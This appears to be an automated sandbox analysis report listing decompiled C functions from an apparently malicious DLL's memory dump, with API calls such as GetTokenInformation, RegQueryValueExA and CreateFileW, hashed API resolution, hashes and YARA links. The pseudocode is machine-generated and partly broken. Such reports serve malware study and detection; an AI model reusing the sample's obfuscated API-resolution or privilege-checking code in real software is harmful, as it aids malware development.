Opcode Fuzzy Hash: c40c08144997b60c4ea53747b7b871637c1ae80dd3cb3e6d9e2e565a80ada299
Instruction Fuzzy Hash: 09B1AEB5E002188FCB14CF58C980A9DFBF1BF88314F5685AAE949AB352D734A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6ED910A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6ED910A4(void* __ecx) {
				long _v12;
				void* _v20;
				void* _v24;
				long _v32;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v64;
				void* _v88;
				void* _v92;
				int _t33;
				signed char* _t35;
				intOrPtr* _t40;
				intOrPtr _t41;
				long* _t50;
				intOrPtr* _t59;
				intOrPtr* _t65;
				void* _t66;
				void* _t68;
				void* _t69;
				signed char* _t70;
				void* _t72;
				long* _t74;

				_t74 =  &_v32;
				_t69 = __ecx;
				_v12 = 0;
				_t59 = E6ED9306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t59 != 0) {
					 *_t59(_t69, 8,  &_v12);
				}
				_t50 = _t74;
				 *_t50 = _v12;
				_t50[1] = 1;
				if(E6ED8C280(_t50) != 0) {
					L6:
					if(_t74[1] != 0) {
						E6ED8BB44(_t74);
					}
					return 0;
				} else {
					_t74[6] = 0;
					if(E6ED9306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t74[6])); // executed
					}
					_t26 = _t74[6];
					if(_t74[6] != 0) {
						E6ED8F584( &_v32, _t26);
						_t68 = E6ED8F4BC( &(_t74[3]), 0);
						if(E6ED9306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
							L32:
							E6ED8F654( &_v32);
							goto L6;
						}
						_t33 = GetTokenInformation(_v40, 0x19, _t68, _t74[7],  &(_t74[6])); // executed
						if(_t33 == 0) {
							goto L32;
						}
						_t35 = E6ED9306C(0x150c05fc, 0x92f703d0, 0x150c05fc, 0x150c05fc);
						if(_t35 == 0) {
							goto L32;
						}
						_push( *_t68);
						asm("int3");
						asm("int3");
						_t70 = _t35;
						if(_t70 == 0) {
							goto L32;
						}
						_t65 = E6ED9306C(0x150c05fc, 0x18603352, 0x150c05fc, 0x150c05fc);
						if(_t65 == 0) {
							goto L32;
						}
						_t40 =  *_t65( *_t68, ( *_t70 & 0x000000ff) - 1);
						if(_t40 == 0) {
							goto L32;
						}
						_t41 =  *_t40;
						if(_t41 == 0) {
							_t72 = 1;
						} else {
							if(_t41 == 0x1000) {
								_t72 = 2;
							} else {
								if(_t41 == 0x2100) {
									_t72 = 4;
								} else {
									if(_t41 == 0x2000) {
										_t72 = 3;
									} else {
										if(_t41 == 0x3000) {
											_t72 = 5;
										} else {
											if(_t41 == 0x4000) {
												_t72 = 6;
											} else {
												_t66 = 7;
												_t72 =  ==  ? _t66 : 0;
											}
										}
									}
								}
							}
						}
						E6ED8F654( &_v48);
						if(_v52 != 0) {
							E6ED8BB44(_t74);
						}
						return _t72;
					}
					goto L6;
				}
			}

0x6ed910a6
0x6ed910b3
0x6ed910b5
0x6ed910c4
0x6ed910c8
0x6ed910d2
0x6ed910d2
0x6ed910d8
0x6ed910db
0x6ed910dd
0x6ed910e8
0x6ed91122
0x6ed91127
0x6ed9112c
0x6ed9112c
0x00000000
0x6ed910ea
0x6ed910f4
0x6ed91107
0x6ed91118
0x6ed91118
0x6ed9111a
0x6ed91120
0x6ed9113e
0x6ed9114e
0x6ed91165
0x6ed91247
0x6ed9124b
0x00000000
0x6ed9124b
0x6ed9117b
0x6ed9117f
0x00000000
0x00000000
0x6ed91191
0x6ed91198
0x00000000
0x00000000
0x6ed9119e
0x6ed911a0
0x6ed911a1
0x6ed911a2
0x6ed911a6
0x00000000
0x00000000
0x6ed911bd
0x6ed911c1
0x00000000
0x00000000
0x6ed911ce
0x6ed911d2
0x00000000
0x00000000
0x6ed911d4
0x6ed911d8
0x6ed91227
0x6ed911da
0x6ed911df
0x6ed91222
0x6ed911e1
0x6ed911e6
0x6ed9121d
0x6ed911e8
0x6ed911ed
0x6ed91218
0x6ed911ef
0x6ed911f4
0x6ed91213
0x6ed911f6
0x6ed911fb
0x6ed9120e
0x6ed911fd
0x6ed911ff
0x6ed91207
0x6ed91207
0x6ed911fb
0x6ed911f4
0x6ed911ed
0x6ed911e6
0x6ed911df
0x6ed9122c
0x6ed91236
0x6ed9123b
0x6ed9123b
0x00000000
0x6ed91240
0x00000000
0x6ed91120

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6ED91118
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6ED9117B

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
Instruction ID: 51fa40063a08cb72fa7543856981aaf70a6eb8f3cc8e0e4633106d1fb8f05b01
Opcode Fuzzy Hash: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
Instruction Fuzzy Hash: 5E411270244243AAEB15EBE9DD21BAF76ED9F86304F518C28B990DA1D4DB30C849E761

Uniqueness

Uniqueness Score: -1.00%

Function 6ED957B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6ED957B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6ED93064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6ED8F828(_a8, _t15);
							if(E6ED93064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6ED8F4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6ed957b8
0x6ed957b9
0x6ed957bb
0x6ed957c0
0x6ed957c7
0x6ed957cb
0x6ed957cb
0x6ed957cb
0x6ed957cf
0x6ed95815
0x6ed95815
0x6ed957d1
0x6ed957d1
0x6ed957d7
0x6ed957e0
0x6ed957e3
0x6ed957fa
0x6ed9580b
0x6ed9580b
0x6ed9580d
0x6ed95813
0x6ed9581e
0x6ed95836
0x6ed95856
0x6ed95856
0x6ed95858
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed957d7
0x6ed95860

APIs

RegQueryValueExA.KERNELBASE(?,6ED9D1F8,00000000,?,00000000,00000000,?,?,?,6ED9D1F8,?,6ED95887,?,00000000,00000000), ref: 6ED9580B
RegQueryValueExA.KERNELBASE(?,6ED9D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6ED9D1F8,?,6ED95887,?,00000000), ref: 6ED95856

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 512058fc36bef99c48cd2f7528d3b78eb3ff2add05e720d24adcf44e0688567a
Instruction ID: 32c41acbf4a8dfa982c68ee46e51643bf778b38e2d1e59cd4d25b6f2eb43eaf3
Opcode Fuzzy Hash: 512058fc36bef99c48cd2f7528d3b78eb3ff2add05e720d24adcf44e0688567a
Instruction Fuzzy Hash: 9411AF30209306FBD7109FA5DC90EABBBDCEF46759F10892DB4988B141EB21E800EB71

Uniqueness

Uniqueness Score: -1.00%

Function 6ED95B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6ED95B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6ED8D1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6ED8D6D0(__ecx, _t60);
					E6ED8CFF8(_t56,  *_t60);
					E6ED8CFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6ED962B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6ED93064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6ED8C26C(_t40);
					if(E6ED8C280(_t40) != 0) {
						_t56[2] = E6ED935F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6ED93064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6ED93698(_t59, 0xff, 8);
						if(E6ED93064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6ed95b43
0x6ed95b45
0x6ed95b52
0x6ed95b56
0x6ed95b5a
0x6ed95b64
0x6ed95b6b
0x6ed95b6b
0x6ed95b72
0x6ed95b74
0x6ed95b79
0x6ed95b82
0x6ed95b8a
0x6ed95b8a
0x6ed95b7b
0x6ed95b7d
0x6ed95b7d
0x6ed95b79
0x6ed95b8f
0x6ed95b9b
0x6ed95ccc
0x6ed95c09
0x6ed95c12
0x6ed95c13
0x6ed95c18
0x6ed95c19
0x6ed95c0b
0x6ed95c0d
0x6ed95c0d
0x6ed95c2f
0x6ed95c43
0x6ed95c31
0x6ed95c3e
0x6ed95c40
0x6ed95c40
0x6ed95c45
0x6ed95c4a
0x6ed95c58
0x6ed95cc3
0x00000000
0x6ed95c5a
0x6ed95c5f
0x6ed95cac
0x6ed95cae
0x6ed95cb0
0x6ed95cba
0x6ed95cba
0x6ed95cb0
0x6ed95c61
0x6ed95c6d
0x6ed95c86
0x6ed95c88
0x6ed95c89
0x6ed95c8a
0x6ed95c8c
0x6ed95c8e
0x6ed95c8f
0x6ed95c8f
0x00000000
0x6ed95c92
0x6ed95ba1
0x6ed95bb1
0x6ed95bb1

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b32cd924e2e184c30a9a206f24908bfb08a530b38a505f7ff0f3196b0aa5451
Instruction ID: 69e53f2f77a10997543830476dfa469e04067fab1debdffe84c7dd4e57053a94
Opcode Fuzzy Hash: 6b32cd924e2e184c30a9a206f24908bfb08a530b38a505f7ff0f3196b0aa5451
Instruction Fuzzy Hash: F231F03028430AFEEB502BF54D99F6B779DDB8164EF004939FA459A1C5EE22D814E271

Uniqueness

Uniqueness Score: -1.00%

Function 00AC1A6A, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 30%

			_entry_(void* __eflags, intOrPtr* _a4) {
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				intOrPtr _v36;
				long _v40;
				int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr _t30;
				intOrPtr _t31;
				int _t39;
				intOrPtr _t45;
				long _t52;
				long _t54;
				intOrPtr* _t55;

				_t26 = _a4;
				 *_t55 = _t26;
				_v20 = _t26;
				_v24 = L00AC10B0(__eflags);
				_t28 = E00AC2084();
				_v28 = _t28;
				if(_t28 != 0) {
					 *_t55 = _v28;
					_t45 =  *((intOrPtr*)(_v20 + 0x48))();
					_t55 = _t55 - 4;
					_v56 = _t45;
				}
				 *_t55 = _v20;
				_t30 = E00AC2715();
				 *_t55 = _v20;
				_v48 = _t30;
				_t31 = E00AC1D08(); // executed
				_t52 =  *_v20;
				_t54 =  *((intOrPtr*)(_t52 + 0x3c));
				_t53 = _t54;
				_t46 = _t52;
				_v52 = _t31;
				_v36 = _t52;
				_v32 = _t54;
				_v40 = _t52;
				if(_t54 != 0) {
					_v40 = _v36 + (_v32 + 0x0000ffff & 0x0000ffff) + 1;
				}
				if( *((short*)(_v40 + 0x5c)) != 3) {
					_t39 = FreeConsole(); // executed
					_v44 = _t39;
				}
				 *_t55 = _v20;
				E00AC2432();
				 *_t55 = _v20; // executed
				E00AC11ED(_t46, _t53, _t54); // executed
				return 0;
			}

0x00ac1a73
0x00ac1a76
0x00ac1a79
0x00ac1a81
0x00ac1a84
0x00ac1a8c
0x00ac1a8f
0x00ac1b21
0x00ac1b27
0x00ac1b2a
0x00ac1b2d
0x00ac1b2d
0x00ac1ac7
0x00ac1aca
0x00ac1ad2
0x00ac1ad5
0x00ac1ad8
0x00ac1ae0
0x00ac1ae2
0x00ac1ae5
0x00ac1aec
0x00ac1aee
0x00ac1af1
0x00ac1af4
0x00ac1af7
0x00ac1afa
0x00ac1aab
0x00ac1aab
0x00ac1ab6
0x00ac1abd
0x00ac1abf
0x00ac1abf
0x00ac1b01
0x00ac1b04
0x00ac1b0c
0x00ac1b0f
0x00ac1b1d

APIs

FreeConsole.KERNELBASE ref: 00AC1ABD

Memory Dump Source

Source File: 00000000.00000002.621607284.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 5f9f50ddde32dd6a4f80cd0fa184a52dcb89b19a55860ab176ff5f56bdb5db0f
Instruction ID: 6305a8bc635aa33226ca7587664688b22329d4dabf05b3a45cff8cbaa5250e62
Opcode Fuzzy Hash: 5f9f50ddde32dd6a4f80cd0fa184a52dcb89b19a55860ab176ff5f56bdb5db0f
Instruction Fuzzy Hash: C721F8B1E0521A8FCB04EFA8C985AAEBBF0FF09340F16482DE555E7341E7359980CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6ED95BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6ED95BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6ED93064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6ED8C26C(_t24);
					if(E6ED8C280(_t24) != 0) {
						_t33[2] = E6ED935F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6ED93064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6ED93698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6ED93064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6ed95be5
0x6ed95be7
0x6ed95bfe
0x6ed95c09
0x6ed95c12
0x6ed95c18
0x6ed95c19
0x6ed95c0b
0x6ed95c0d
0x6ed95c0d
0x6ed95c2f
0x6ed95c43
0x6ed95c31
0x6ed95c3e
0x6ed95c40
0x6ed95c40
0x6ed95c45
0x6ed95c4a
0x6ed95c58
0x6ed95cc3
0x6ed95cc6
0x6ed95c5a
0x6ed95c5f
0x6ed95cac
0x6ed95cb0
0x6ed95cba
0x6ed95cba
0x6ed95cb0
0x6ed95c61
0x6ed95c6d
0x6ed95c72
0x6ed95c86
0x6ed95c88
0x6ed95c89
0x6ed95c8a
0x6ed95c8c
0x6ed95c8e
0x6ed95c8f
0x6ed95c8f
0x6ed95c92
0x6ed95c92
0x6ed95be9
0x6ed95be9
0x6ed95bf0
0x6ed95bf0
0x6ed95c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6ED95C3E

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e18e8a074bc90ceaefeae33184f5781e9a4d35576f6aed19d3443c1852e34b7f
Instruction ID: 0a852dc750450cbb26b9dcadf2eee430f9cb7baed82c17bbada6ef9d97ee794b
Opcode Fuzzy Hash: e18e8a074bc90ceaefeae33184f5781e9a4d35576f6aed19d3443c1852e34b7f
Instruction Fuzzy Hash: D201223528420AFAFB902BE54D45F6B774CDB8235AF008835FA05551C8DB23A868E231

Uniqueness

Uniqueness Score: -1.00%

Function 6ED95BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6ED95BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6ED93064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6ED8C26C(_t24);
				if(E6ED8C280(_t24) != 0) {
					_t34[2] = E6ED935F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6ED93064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6ED93698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6ED93064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6ed95bbd
0x6ed95bc1
0x6ed95bc4
0x6ed95bc7
0x6ed95c09
0x6ed95c12
0x6ed95c18
0x6ed95c19
0x6ed95c0b
0x6ed95c0d
0x6ed95c0d
0x6ed95c2f
0x6ed95c43
0x6ed95c31
0x6ed95c3e
0x6ed95c40
0x6ed95c40
0x6ed95c45
0x6ed95c4a
0x6ed95c58
0x6ed95cc3
0x6ed95cc6
0x6ed95c5a
0x6ed95c5f
0x6ed95cac
0x6ed95cb0
0x6ed95cba
0x6ed95cba
0x6ed95cb0
0x6ed95c61
0x6ed95c6d
0x6ed95c72
0x6ed95c86
0x6ed95c88
0x6ed95c89
0x6ed95c8a
0x6ed95c8c
0x6ed95c8e
0x6ed95c8f
0x6ed95c8f
0x6ed95c92
0x6ed95c92
0x6ed95c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6ED95C3E

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8e27c5f9bd282d6c994ea0430aa2a02b23de095639b9ec827df2e67598d971dc
Instruction ID: 06d4a5dd795a18081a855e8dc7dae9f6a4ec19ef98ff5fa5b3da3c5e0e9d29b5
Opcode Fuzzy Hash: 8e27c5f9bd282d6c994ea0430aa2a02b23de095639b9ec827df2e67598d971dc
Instruction Fuzzy Hash: B401DE3128430AFAFB542BE55D45F7B778CDFC279AF008835BA05A51C9EA13A869D131

Uniqueness

Uniqueness Score: -1.00%

Function 6ED95BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6ED95BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6ED93064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6ED8C26C(_t24);
				if(E6ED8C280(_t24) != 0) {
					_t34[2] = E6ED935F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6ED93064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6ED93698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6ED93064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6ed95bd1
0x6ed95bd8
0x6ed95bdb
0x6ed95c09
0x6ed95c12
0x6ed95c18
0x6ed95c19
0x6ed95c0b
0x6ed95c0d
0x6ed95c0d
0x6ed95c2f
0x6ed95c43
0x6ed95c31
0x6ed95c3e
0x6ed95c40
0x6ed95c40
0x6ed95c45
0x6ed95c4a
0x6ed95c58
0x6ed95cc3
0x6ed95cc6
0x6ed95c5a
0x6ed95c5f
0x6ed95cac
0x6ed95cb0
0x6ed95cba
0x6ed95cba
0x6ed95cb0
0x6ed95c61
0x6ed95c6d
0x6ed95c72
0x6ed95c86
0x6ed95c88
0x6ed95c89
0x6ed95c8a
0x6ed95c8c
0x6ed95c8e
0x6ed95c8f
0x6ed95c8f
0x6ed95c92
0x6ed95c92
0x6ed95c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6ED95C3E

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dd2ad8cc2bea139498f734a9424d4da058e985a444105aafc8fc825a18545deb
Instruction ID: e25d1a6c711c79bb97114f54afd99825b6df5925609480b0bf165433b09e5167
Opcode Fuzzy Hash: dd2ad8cc2bea139498f734a9424d4da058e985a444105aafc8fc825a18545deb
Instruction Fuzzy Hash: 1701283528420AFAFB502BF54D45F7B734DDB8235AF004935FA05951C9DE23A868D131

Uniqueness

Uniqueness Score: -1.00%

Function 6ED95BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6ED95BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6ED93064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6ED8C26C(_t23);
				if(E6ED8C280(_t23) != 0) {
					_t31[2] = E6ED935F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6ED93064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6ED93698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6ED93064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6ed95bb3
0x6ed95bba
0x6ed95c09
0x6ed95c12
0x6ed95c18
0x6ed95c19
0x6ed95c0b
0x6ed95c0d
0x6ed95c0d
0x6ed95c2f
0x6ed95c43
0x6ed95c31
0x6ed95c3e
0x6ed95c40
0x6ed95c40
0x6ed95c45
0x6ed95c4a
0x6ed95c58
0x6ed95cc3
0x6ed95cc6
0x6ed95c5a
0x6ed95c5f
0x6ed95cac
0x6ed95cb0
0x6ed95cba
0x6ed95cba
0x6ed95cb0
0x6ed95c61
0x6ed95c6d
0x6ed95c72
0x6ed95c86
0x6ed95c88
0x6ed95c89
0x6ed95c8a
0x6ed95c8c
0x6ed95c8e
0x6ed95c8f
0x6ed95c8f
0x6ed95c92
0x6ed95c92
0x6ed95c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6ED95C3E

Memory Dump Source

